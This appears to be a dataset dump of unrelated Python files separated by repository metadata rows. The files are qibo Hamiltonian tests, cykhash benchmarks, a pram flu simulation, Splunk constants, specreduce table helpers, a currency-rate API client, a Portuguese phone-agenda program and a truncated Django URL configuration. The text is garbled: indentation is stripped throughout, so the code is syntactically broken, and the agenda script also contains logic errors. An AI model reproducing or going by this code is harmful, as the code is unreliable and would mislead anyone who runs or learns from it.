H1 = hamiltonians.Hamiltonian(2, np.eye(4))
H1 = hamiltonians.Hamiltonian(2, np.eye(4))
H1 = hamiltonians.Hamiltonian(2, K.eye(4))
H1 = hamiltonians.Hamiltonian(2, K.eye(4))
with pytest.raises(ValueError):
H1 = hamiltonians.Hamiltonian(-2, np.eye(4))
with pytest.raises(RuntimeError):
H2 = hamiltonians.Hamiltonian(np.eye(2), np.eye(4))
with pytest.raises(ValueError):
H3 = hamiltonians.Hamiltonian(4, np.eye(10))
@pytest.mark.parametrize("dtype", K.numeric_types)
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_algebraic_operations(dtype, sparse_type):
"""Test basic hamiltonian overloading."""
def transformation_a(a, b):
c1 = dtype(0.1)
return a + c1 * b
def transformation_b(a, b):
c1 = dtype(2)
c2 = dtype(3.5)
return c1 * a - b * c2
def transformation_c(a, b, use_eye=False):
c1 = dtype(4.5)
if use_eye:
return a + c1 * np.eye(a.shape[0]) - b
else:
return a + c1 - b
def transformation_d(a, b, use_eye=False):
c1 = dtype(10.5)
c2 = dtype(2)
if use_eye:
return c1 * np.eye(a.shape[0]) - a + c2 * b
else:
return c1 - a + c2 * b
if sparse_type is None:
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5)
H2 = hamiltonians.XXZ(nqubits=2, delta=1)
mH1, mH2 = K.to_numpy(H1.matrix), K.to_numpy(H2.matrix)
else:
mH1 = sparse.rand(64, 64, format=sparse_type)
mH2 = sparse.rand(64, 64, format=sparse_type)
H1 = hamiltonians.Hamiltonian(6, mH1)
H2 = hamiltonians.Hamiltonian(6, mH2)
hH1 = transformation_a(mH1, mH2)
hH2 = transformation_b(mH1, mH2)
hH3 = transformation_c(mH1, mH2, use_eye=True)
hH4 = transformation_d(mH1, mH2, use_eye=True)
HT1 = transformation_a(H1, H2)
HT2 = transformation_b(H1, H2)
HT3 = transformation_c(H1, H2)
HT4 = transformation_d(H1, H2)
K.assert_allclose(hH1, HT1.matrix)
K.assert_allclose(hH2, HT2.matrix)
K.assert_allclose(hH3, HT3.matrix)
K.assert_allclose(hH4, HT4.matrix)
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_addition(sparse_type):
if sparse_type is None:
H1 = hamiltonians.Y(nqubits=3)
H2 = hamiltonians.TFIM(nqubits=3, h=1.0)
else:
H1 = hamiltonians.Hamiltonian(6, sparse.rand(64, 64, format=sparse_type))
H2 = hamiltonians.Hamiltonian(6, sparse.rand(64, 64, format=sparse_type))
H = H1 + H2
matrix = H1.matrix + H2.matrix
K.assert_allclose(H.matrix, matrix)
H = H1 - 0.5 * H2
matrix = H1.matrix - 0.5 * H2.matrix
K.assert_allclose(H.matrix, matrix)
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5)
H2 = hamiltonians.XXZ(nqubits=3, delta=0.1)
with pytest.raises(RuntimeError):
R = H1 + H2
with pytest.raises(RuntimeError):
R = H1 - H2
def test_hamiltonian_operation_errors():
"""Testing hamiltonian not implemented errors."""
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5)
H2 = hamiltonians.XXZ(nqubits=2, delta=0.1)
with pytest.raises(NotImplementedError):
R = H1 * H2
with pytest.raises(NotImplementedError):
R = H1 + "a"
with pytest.raises(NotImplementedError):
R = H2 - (2,)
with pytest.raises(NotImplementedError):
R = [3] - H1
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_matmul(backend, sparse_type):
"""Test matrix multiplication between Hamiltonians."""
if sparse_type is None:
nqubits = 3
H1 = hamiltonians.TFIM(nqubits, h=1.0)
H2 = hamiltonians.Y(nqubits)
else:
nqubits = 5
nstates = 2 ** nqubits
H1 = hamiltonians.Hamiltonian(nqubits, random_sparse_matrix(nstates, sparse_type))
H2 = hamiltonians.Hamiltonian(nqubits, random_sparse_matrix(nstates, sparse_type))
m1 = K.to_numpy(H1.matrix)
m2 = K.to_numpy(H2.matrix)
if K.name in ("qibotf", "tensorflow") and sparse_type is not None:
with pytest.raises(NotImplementedError):
_ = H1 @ H2
else:
K.assert_allclose((H1 @ H2).matrix, m1 @ m2)
K.assert_allclose((H2 @ H1).matrix, m2 @ m1)
with pytest.raises(ValueError):
H1 @ np.zeros(3 * (2 ** nqubits,), dtype=m1.dtype)
with pytest.raises(NotImplementedError):
H1 @ 2
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_matmul_states(backend, sparse_type):
"""Test matrix multiplication between Hamiltonian and states."""
if sparse_type is None:
nqubits = 3
H = hamiltonians.TFIM(nqubits, h=1.0)
else:
nqubits = 5
nstates = 2 ** nqubits
H = hamiltonians.Hamiltonian(nqubits, random_sparse_matrix(nstates, sparse_type))
hm = K.to_numpy(H.matrix)
v = random_complex(2 ** nqubits, dtype=hm.dtype)
m = random_complex((2 ** nqubits, 2 ** nqubits), dtype=hm.dtype)
Hv = H @ K.cast(v)
Hm = H @ K.cast(m)
K.assert_allclose(Hv, hm.dot(v))
K.assert_allclose(Hm, hm @ m)
from qibo.core.states import VectorState
Hstate = H @ VectorState.from_tensor(K.cast(v))
K.assert_allclose(Hstate, hm.dot(v))
@pytest.mark.parametrize("density_matrix", [True, False])
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_expectation(backend, dense, density_matrix, sparse_type):
"""Test Hamiltonian expectation value calculation."""
if sparse_type is None:
h = hamiltonians.XXZ(nqubits=3, delta=0.5, dense=dense)
else:
h = hamiltonians.Hamiltonian(6, random_sparse_matrix(64, sparse_type))
matrix = K.to_numpy(h.matrix)
if density_matrix:
state = random_complex((2 ** h.nqubits, 2 ** h.nqubits))
state = state + state.T.conj()
norm = np.trace(state)
target_ev = np.trace(matrix.dot(state)).real
else:
state = random_complex(2 ** h.nqubits)
norm = np.sum(np.abs(state) ** 2)
target_ev = np.sum(state.conj() * matrix.dot(state)).real
K.assert_allclose(h.expectation(state), target_ev)
K.assert_allclose(h.expectation(state, True), target_ev / norm)
def test_hamiltonian_expectation_errors():
h = hamiltonians.XXZ(nqubits=3, delta=0.5)
state = random_complex((4, 4, 4))
with pytest.raises(ValueError):
h.expectation(state)
with pytest.raises(TypeError):
h.expectation("test")
@pytest.mark.parametrize("dtype", K.numeric_types)
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_eigenvalues(dtype, sparse_type, dense):
"""Testing hamiltonian eigenvalues scaling."""
if sparse_type is None:
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
else:
from scipy import sparse
H1 = hamiltonians.XXZ(nqubits=5, delta=0.5)
m = getattr(sparse, f"{sparse_type}_matrix")(K.to_numpy(H1.matrix))
H1 = hamiltonians.Hamiltonian(5, m)
H1_eigen = sorted(K.to_numpy(H1.eigenvalues()))
hH1_eigen = sorted(K.to_numpy(K.eigvalsh(H1.matrix)))
K.assert_allclose(sorted(H1_eigen), hH1_eigen)
c1 = dtype(2.5)
H2 = c1 * H1
H2_eigen = sorted(K.to_numpy(H2._eigenvalues))
hH2_eigen = sorted(K.to_numpy(K.eigvalsh(c1 * H1.matrix)))
K.assert_allclose(H2_eigen, hH2_eigen)
c2 = dtype(-11.1)
H3 = H1 * c2
if sparse_type is None:
H3_eigen = sorted(K.to_numpy(H3._eigenvalues))
hH3_eigen = sorted(K.to_numpy(K.eigvalsh(H1.matrix * c2)))
K.assert_allclose(H3_eigen, hH3_eigen)
else:
assert H3._eigenvalues is None
@pytest.mark.parametrize("dtype", K.numeric_types)
@pytest.mark.parametrize("dense", [True, False])
def test_hamiltonian_eigenvectors(dtype, dense):
"""Testing hamiltonian eigenvectors scaling."""
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
V1 = K.to_numpy(H1.eigenvectors())
U1 = K.to_numpy(H1.eigenvalues())
K.assert_allclose(H1.matrix, V1 @ np.diag(U1) @ V1.T)
c1 = dtype(2.5)
H2 = c1 * H1
V2 = K.to_numpy(H2._eigenvectors)
U2 = K.to_numpy(H2._eigenvalues)
K.assert_allclose(H2.matrix, V2 @ np.diag(U2) @ V2.T)
c2 = dtype(-11.1)
H3 = H1 * c2
V3 = K.to_numpy(H3.eigenvectors())
U3 = K.to_numpy(H3._eigenvalues)
K.assert_allclose(H3.matrix, V3 @ np.diag(U3) @ V3.T)
c3 = dtype(0)
H4 = c3 * H1
V4 = K.to_numpy(H4._eigenvectors)
U4 = K.to_numpy(H4._eigenvalues)
K.assert_allclose(H4.matrix, V4 @ np.diag(U4) @ V4.T)
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_ground_state(sparse_type, dense):
"""Test Hamiltonian ground state."""
if sparse_type is None:
H = hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
else:
from scipy import sparse
H = hamiltonians.XXZ(nqubits=5, delta=0.5)
m = getattr(sparse, f"{sparse_type}_matrix")(K.to_numpy(H.matrix))
H = hamiltonians.Hamiltonian(5, m)
V = K.to_numpy(H.eigenvectors())
K.assert_allclose(H.ground_state(), V[:, 0])
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_exponentiation(sparse_type, dense):
"""Test matrix exponentiation of Hamiltonians ``exp(1j * t * H)``."""
from scipy.linalg import expm
def construct_hamiltonian():
if sparse_type is None:
return hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
else:
ham = hamiltonians.XXZ(nqubits=5, delta=0.5)
m = getattr(sparse, f"{sparse_type}_matrix")(K.to_numpy(ham.matrix))
return hamiltonians.Hamiltonian(5, m)
H = construct_hamiltonian()
target_matrix = expm(-0.5j * K.to_numpy(H.matrix))
K.assert_allclose(H.exp(0.5), target_matrix)
H = construct_hamiltonian()
_ = H.eigenvectors()
K.assert_allclose(H.exp(0.5), target_matrix)
| 35.880878 | 90 | 0.62441 | 1,570 | 11,446 | 4.428662 | 0.113376 | 0.057529 | 0.028765 | 0.018122 | 0.573278 | 0.477779 | 0.40069 | 0.319718 | 0.298289 | 0.236589 | 0 | 0.039634 | 0.235104 | 11,446 | 318 | 91 | 35.993711 | 0.75454 | 0.040014 | 0 | 0.366795 | 0 | 0 | 0.031361 | 0 | 0 | 0 | 0 | 0 | 0.092664 | 1 | 0.069498 | false | 0 | 0.034749 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39373fd62c1c95168677446d3aff06f09ea5b298 | 3,179 | py | Python | tests/asv_bench/benchmarks/count_if.py | realead/cykhash | b1a45843c3be49cd232d3c78315d2291a830284f | [
"MIT"
] | 18 | 2019-03-13T08:20:06.000Z | 2021-06-22T08:03:01.000Z | tests/asv_bench/benchmarks/count_if.py | realead/cykhash | b1a45843c3be49cd232d3c78315d2291a830284f | [
"MIT"
] | 6 | 2020-04-13T10:11:45.000Z | 2021-11-14T15:59:55.000Z | tests/asv_bench/benchmarks/count_if.py | realead/cykhash | b1a45843c3be49cd232d3c78315d2291a830284f | [
"MIT"
] | 7 | 2019-05-19T22:24:57.000Z | 2020-08-26T23:01:23.000Z | import numpy as np
from cykhash import count_if_int64, count_if_int64_from_iter, Int64Set_from, Int64Set_from_buffer
from cykhash import count_if_int32, count_if_int32_from_iter, Int32Set_from, Int32Set_from_buffer
from cykhash import count_if_float64, count_if_float64_from_iter, Float64Set_from, Float64Set_from_buffer
from cykhash import count_if_float32, count_if_float32_from_iter, Float32Set_from, Float32Set_from_buffer
from cykhash import count_if_pyobject, count_if_pyobject_from_iter, PyObjectSet_from, PyObjectSet_from_buffer
CREATE_SET={
np.float64 : Float64Set_from_buffer,
np.float32 : Float32Set_from_buffer,
np.int64 : Int64Set_from_buffer,
np.int32 : Int32Set_from_buffer,
}
COUNT_IF = {
np.float64 : count_if_float64,
np.float32 : count_if_float32,
np.int64 : count_if_int64,
np.int32 : count_if_int32,
}
class CountIfObject:
def setup(self):
N=100_000
self.set = PyObjectSet_from(x<<32 for x in range(N))
np.random.seed(42)
self.query = np.random.randint(0,N,N).astype(np.object)
def time_countif(self):
count_if_pyobject(self.query, self.set)
class CountIfSameLongTuple:
def setup(self):
t = tuple(range(1000))
self.set = PyObjectSet_from([t])
self.query = np.array(["a"] + [t]*1000)
def time_countif(self):
count_if_pyobject(self.query, self.set)
class CountIfArange:
params = [
[np.float64, np.float32, np.int64, np.int32],
[1_000, 2_000, 8_000, 10_000, 100_000, 1_000_000, 10_000_000, 100_000_000],
[-2, 0, 2]
]
param_names = ["dtype", "M", "offset_factor"]
def setup(self, dtype, M, offset_factor):
self.set = CREATE_SET[dtype](np.arange(M).astype(dtype))
offset = int(M*offset_factor)
N=10**6
np.random.seed(42)
self.query = np.random.randint(offset,M+offset,N).astype(dtype)
def time_countif(self, dtype, M, offset_factor):
COUNT_IF[dtype](self.query, self.set)
class CountIfRandomYes:
params = [
[np.float64, np.float32, np.int64, np.int32], #
[1_000, 2_000, 8_000, 10_000, 100_000, 1_000_000, 10_000_000, 100_000_000],
]
param_names = ["dtype", "M"]
def setup(self, dtype, M):
np.random.seed(42)
keys = (np.random.rand(M)*M).astype(dtype)
self.set = CREATE_SET[dtype](keys)
N=10**6
self.query = (np.random.rand(N)*M).astype(dtype)
def time_countif(self, dtype, M):
COUNT_IF[dtype](self.query, self.set)
class CountIfRandomNo:
params = [
[np.float64, np.float32, np.int64, np.int32], #
[1_000, 2_000, 8_000, 10_000, 100_000, 1_000_000, 10_000_000, 100_000_000],
]
param_names = ["dtype", "M"]
def setup(self, dtype, M):
np.random.seed(42)
keys = (np.random.rand(M)*M).astype(dtype)
self.set = CREATE_SET[dtype](keys)
N=10**6
self.query = (np.random.rand(N)*M+2*M).astype(dtype)
def time_countif(self, dtype, M):
COUNT_IF[dtype](self.query, self.set)
| 30.864078 | 110 | 0.643599 | 465 | 3,179 | 4.139785 | 0.150538 | 0.072727 | 0.024935 | 0.057143 | 0.581818 | 0.536623 | 0.536623 | 0.465974 | 0.428052 | 0.388571 | 0 | 0.109786 | 0.23498 | 3,179 | 102 | 111 | 31.166667 | 0.681743 | 0 | 0 | 0.460526 | 0 | 0 | 0.010079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.078947 | 0 | 0.355263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3938add8f52f37344b2c5a7d5cbf597b4f740a18 | 1,188 | py | Python | src/sim/06-allegheny-05-school-work-flu/sim-test-01.py | momacs/pram | d2de43ea447d13a65d814f781ec86889754f76fe | [
"BSD-3-Clause"
] | 10 | 2019-01-18T19:11:54.000Z | 2022-03-16T08:39:36.000Z | src/sim/06-allegheny-05-school-work-flu/sim-test-01.py | momacs/pram | d2de43ea447d13a65d814f781ec86889754f76fe | [
"BSD-3-Clause"
] | 2 | 2019-02-19T15:10:44.000Z | 2019-02-26T04:26:24.000Z | src/sim/06-allegheny-05-school-work-flu/sim-test-01.py | momacs/pram | d2de43ea447d13a65d814f781ec86889754f76fe | [
"BSD-3-Clause"
] | 3 | 2019-02-19T15:11:08.000Z | 2021-08-20T11:51:04.000Z | '''
A test simulation involving the SEIR flu model in isolation.
'''
from pram.data import GroupSizeProbe, ProbeMsgMode
from pram.entity import Group, Site
from pram.rule import SEIRFluRule
from pram.sim import Simulation
rand_seed = 1928
probe_grp_size_flu = GroupSizeProbe.by_attr('flu', SEIRFluRule.ATTR, SEIRFluRule.State, msg_mode=ProbeMsgMode.DISP, memo='Mass distribution across flu states')
(Simulation().
set().
rand_seed(rand_seed).
done().
add().
rule(SEIRFluRule()).
probe(probe_grp_size_flu).
done().
new_group(1000).
done().
summary(True, 0,0,0,0, (0,1)).
run(16).
compact().
summary(False, 8,0,0,0, (1,0))
)
# (Simulation().
# set().
# rand_seed(rand_seed).
# pragma_analyze(False).
# pragma_autocompact(True).
# done().
# add().
# rule(SEIRFluRule()).
# probe(probe_grp_size_flu).
# done().
# new_group(1000).
# done().
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0)
# )
| 24.75 | 159 | 0.590067 | 157 | 1,188 | 4.33758 | 0.356688 | 0.04699 | 0.039648 | 0.123348 | 0.43025 | 0.43025 | 0.321586 | 0.321586 | 0.321586 | 0.321586 | 0 | 0.051111 | 0.242424 | 1,188 | 47 | 160 | 25.276596 | 0.705556 | 0.422559 | 0 | 0.142857 | 0 | 0 | 0.057489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393d8a33f773b3b39e9d958ef90238b7ad2f9749 | 309 | py | Python | Apps/phsplunkoncall/splunkoncall_consts.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 74 | 2019-10-22T02:00:53.000Z | 2022-03-15T12:56:13.000Z | Apps/phsplunkoncall/splunkoncall_consts.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 375 | 2019-10-22T20:53:50.000Z | 2021-11-09T21:28:43.000Z | Apps/phsplunkoncall/splunkoncall_consts.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 175 | 2019-10-23T15:30:42.000Z | 2021-11-05T21:33:31.000Z | # File: splunkoncall_consts.py
#
# Copyright (c) 2018-2021 Splunk Inc.
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
# Define your constants here
INTEGRATION_URL_MISSING = "Integration URL required in asset configuration"
UPDATE_INCIDENT_ERROR = "Error updating incident"
| 28.090909 | 77 | 0.776699 | 43 | 309 | 5.465116 | 0.837209 | 0.017021 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044118 | 0.119741 | 309 | 10 | 78 | 30.9 | 0.819853 | 0.540453 | 0 | 0 | 0 | 0 | 0.522388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393d8d7d5792eab89a415b922f64a52c86ec37a7 | 1,716 | py | Python | specreduce/table_utils.py | simontorres/specreduce | bb41c2d1416cb2fa1137f58643ddd9400a3092b9 | [
"BSD-3-Clause"
] | null | null | null | specreduce/table_utils.py | simontorres/specreduce | bb41c2d1416cb2fa1137f58643ddd9400a3092b9 | [
"BSD-3-Clause"
] | null | null | null | specreduce/table_utils.py | simontorres/specreduce | bb41c2d1416cb2fa1137f58643ddd9400a3092b9 | [
"BSD-3-Clause"
] | null | null | null | """Utility functions to parse master NIST table.
"""
from astropy.table import Column, Table, vstack
import glob
import numpy as np
def sort_table_by_element(table, elem_list):
"""Build table based on list of elements
Parameters
----------
table: astropy table
Table to sort
elem_list: list
list of strings to sort table by
Returns
-------
element_filtered_table: astropytable
Filtered table based on inputs
"""
filtered_table_list = [table[np.where(table['Element'] == elem)] for elem in elem_list]
element_filtered_table = vstack(filtered_table_list)
return element_filtered_table
def sort_table_by_wavelength(table, min_wave, max_wave):
"""Build table off of wavelength ranges
Parameters
----------
min_wave: float
Lower bound wavelength to filter on
max_wave: float
Upper bound wavelength to filter on
Returns
-------
wave_filtered_table: astropytable
Filtered table based on inputs
"""
assert min_wave < max_wave,"Minimum wavelength greater than maximum wavelength."
wave_filtered_table = table[np.where((table['Wavelength'] >= min_wave) &
(table['Wavelength'] <= max_wave)
)]
return wave_filtered_table
def main():
"""A little example.
"""
t = Table.read('data/line_lists/NIST/NIST_combined.csv', format='csv')
elements = ['He I', 'Ne I', 'Ar I']
sorted_by_elem = sort_table_by_element(t, elements)
sorted_by_wave = sort_table_by_wavelength(t, 2000, 3000)
print(sorted_by_wave)
print(sorted_by_elem)
if __name__ == "__main__":
main()
| 26 | 91 | 0.643939 | 216 | 1,716 | 4.851852 | 0.347222 | 0.124046 | 0.052481 | 0.026718 | 0.145038 | 0.097328 | 0.097328 | 0.097328 | 0 | 0 | 0 | 0.00627 | 0.25641 | 1,716 | 65 | 92 | 26.4 | 0.815047 | 0.331002 | 0 | 0 | 0 | 0 | 0.13417 | 0.03668 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.136364 | false | 0 | 0.136364 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393e5bb1bc9612539e7d8b447c1f8d1b0ef109f0 | 1,223 | py | Python | AioCentralBankRuApi.py | dark0ghost/AioCentralBankRuApi | fcd9d0c9bc660c8e03c67d022398b51f47571720 | [
"MIT"
] | null | null | null | AioCentralBankRuApi.py | dark0ghost/AioCentralBankRuApi | fcd9d0c9bc660c8e03c67d022398b51f47571720 | [
"MIT"
] | null | null | null | AioCentralBankRuApi.py | dark0ghost/AioCentralBankRuApi | fcd9d0c9bc660c8e03c67d022398b51f47571720 | [
"MIT"
] | null | null | null | import aiohttp
from typing import Dict
class CenterBankApi:
"""
class implements api cbr
"""
def __init__(self, session: aiohttp.ClientSession) -> None:
self.link = "https://www.cbr-xml-daily.ru/daily_json.js"
self.obj = dict()
self.date: str = ""
self.session: aiohttp.ClientSession = session
async def get_json(self) -> Dict[str, Dict[str, str]]:
"""
get json from https://www.cbr-xml-daily.ru/daily_json.js
:return:
"""
async with self.session.get(self.link) as response:
return await response.json(content_type=None, encoding="utf-8")
async def build_list_coin(self) -> Dict[str, Dict[str, str]]:
"""
build dict from json
:return:
"""
response: Dict[str, Dict[str, str]] = await self.get_json()
self.date: str = response['Date']
for i in response["Valute"].items():
self.obj[i[0]] = {
"name": i[1]["Name"],
"valvue": i[1]["Value"]
}
return self.obj
def __len__(self) -> int:
"""
return len available coin
:return:
"""
return len(self.obj)
| 27.177778 | 75 | 0.540474 | 148 | 1,223 | 4.364865 | 0.371622 | 0.065015 | 0.051084 | 0.065015 | 0.190402 | 0.164087 | 0.099071 | 0.099071 | 0.099071 | 0 | 0 | 0.004796 | 0.31807 | 1,223 | 44 | 76 | 27.795455 | 0.769784 | 0.048242 | 0 | 0 | 0 | 0 | 0.079332 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393f1dae7f66e2378ca21c870e8999d47cde8d9f | 3,868 | py | Python | Sem-10-T2-Q5.py | daianasousa/Atividade-Remota-10 | 824ee93de32d7e93d836b1ac3b5b78eac8a2eea7 | [
"MIT"
] | null | null | null | Sem-10-T2-Q5.py | daianasousa/Atividade-Remota-10 | 824ee93de32d7e93d836b1ac3b5b78eac8a2eea7 | [
"MIT"
] | null | null | null | Sem-10-T2-Q5.py | daianasousa/Atividade-Remota-10 | 824ee93de32d7e93d836b1ac3b5b78eac8a2eea7 | [
"MIT"
] | null | null | null | agenda = {
'João': '86988102987',
}
# (C)RUD
def criar():
# ler o nome
nome = input('Nome: ')
# ler o telefone e adiciona em uma lista telefonica
telefone = [input("Número de telefone: ")]
# empacota nome e telefone com uma variável
lista = (nome, telefone)
# adiciona o aluno ao dicioário
codigo = nome
agenda[codigo] = lista
input('Registro Incluído. Pressione qualquer tecla para contunuar...')
# C(R)UD
def ler(codigo):
# carrega os dados do dicionário e desempacota nas variáveis
nome, telefone = agenda[codigo]
# retorna as variáveis desempacotadas
return nome, telefone
# CR(U)D
def atualizar(codigo):
# carrega dados do aluno definido pelo código
nome, telefone = ler(codigo)
# ler um novo nome para variável auxiliar
aux = input(f'Novo Nome: ')
# se o valor lido para o nome for vazio, ignora e mantém o mesmo valor
if aux != '':
# se for lido um valor válido, adiciona o campo nome
nome = aux
# usa a mesma variável auxiliar para ler telefone
aux = input(f'Novo Telefone: ')
# se o valor lido para o telefone for vazio, ignora e mantém o mesmo valor
if aux != '':
# se for um telefone válido, adiciona um telefone o mais
nova = input(f'Incluir Telefone? (S, N): ')[0].upper() == 'S'
if nova:
agenda[codigo][1].append(str(aux))
print('telefone incluída com sucesso.')
else:
print('Erro!!!!!!!!!!!!1')
# atualiza os dados no dicionário agenda
agenda[codigo] = (nome, telefone)
input('Registro Atualizado. Pressione qualquer tecla para contunuar...')
# CRU(D)
def apagar(codigo):
# ler o código para apagar.
nome, telefone = ler(codigo)
# pegue uma confirmação do usuário para excluir
confirma = input(f'Deseja realmente apagar {nome}? (S, N): ')[0].upper() == 'S'
if confirma:
# se confirmado, apaga o registro
del agenda[codigo]
input('Registro Apagado. Pressione qualquer tecla para contunuar...')
def Agenda_telefonica():
# imprime uma listagem da agenda
print('=' * 10, 'Listando Toda agenda', '=' * 10)
qtd = 0
# código recebe todas as chaves do dicionário agenda
for codigo in agenda:
# ler os dados da agenda
nome, telefone = ler(codigo)
print('-' * 30)
print(f'Nome: {codigo}')
# imprime os dados
print(f'Telefone: {telefone}')
qtd += 1
if qtd == 0:
print('<<< Nada para mostrar >>>')
else:
print(f'{qtd} nomes exibidos no relatório.')
print('=' * 10, 'Fim da Listagem da agenda', '=' * 10)
input('Pressione qualquer tecla para continuar....')
def menu():
# mostra um menu de opções e faz a leitura da opção desejada
while True:
print('1 - (C) Incluir Novo Nome')
print('2 - (R) Incluir Telefone')
print('3 - (U) Excluir Telefone')
print('4 - (D) Excluir Nome')
print('5 - Mostra Agenda')
print('0 - Fim do Programa')
print('=' * 30)
opcao = int(input('Digite sua opção: '))
if opcao in (1, 2, 3, 4, 5, 0):
return opcao
else:
print('Opção Inválida')
def main():
while True:
op = menu()
if op == 1 or op == 2: # create
criar()
elif op == 3 or op == 4: # delete
codigo = int(input('nome para Remover: '))
if codigo in agenda:
apagar(codigo)
else:
print(f'nome não existe na agenda com código {codigo}.')
elif op == 5: # listar todos
Agenda_telefonica()
elif op == 0: # fim do programa
print('Fim do programa.')
break
else:
pass
if __name__ == '__main__':
main()
| 29.082707 | 83 | 0.572389 | 493 | 3,868 | 4.470588 | 0.320487 | 0.038113 | 0.039927 | 0.047187 | 0.128403 | 0.063521 | 0.038113 | 0.038113 | 0.038113 | 0.038113 | 0 | 0.018059 | 0.312823 | 3,868 | 132 | 84 | 29.30303 | 0.811136 | 0.259049 | 0 | 0.144578 | 0 | 0 | 0.283245 | 0 | 0 | 0 | 0 | 0.007576 | 0 | 1 | 0.084337 | false | 0.012048 | 0 | 0 | 0.108434 | 0.228916 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39464a019cb985cdafeee6f4d457d7fc18ed469a | 377 | py | Python | DjangoAPI/MyAPI/urls.py | ashishmenkudale/django_poc | 16f30a10f497f653062ec923d3510f7530ecbedd | [
"MIT"
] | null | null | null | DjangoAPI/MyAPI/urls.py | ashishmenkudale/django_poc | 16f30a10f497f653062ec923d3510f7530ecbedd | [
"MIT"
] | null | null | null | DjangoAPI/MyAPI/urls.py | ashishmenkudale/django_poc | 16f30a10f497f653062ec923d3510f7530ecbedd | [
"MIT"
] | null | null | null | from django.urls import path, include
from . import views
from rest_framework import routers
router = routers.DefaultRouter()
router.register('MyAPI', views.ApprovalsView)
urlpatterns = [
path('api/', include(router.urls)),
path('status/', views.approvereject),
path('form/', views.cxcontact, name='cxform'),
path('form2/', views.cxcontact2, name='cxform2'),
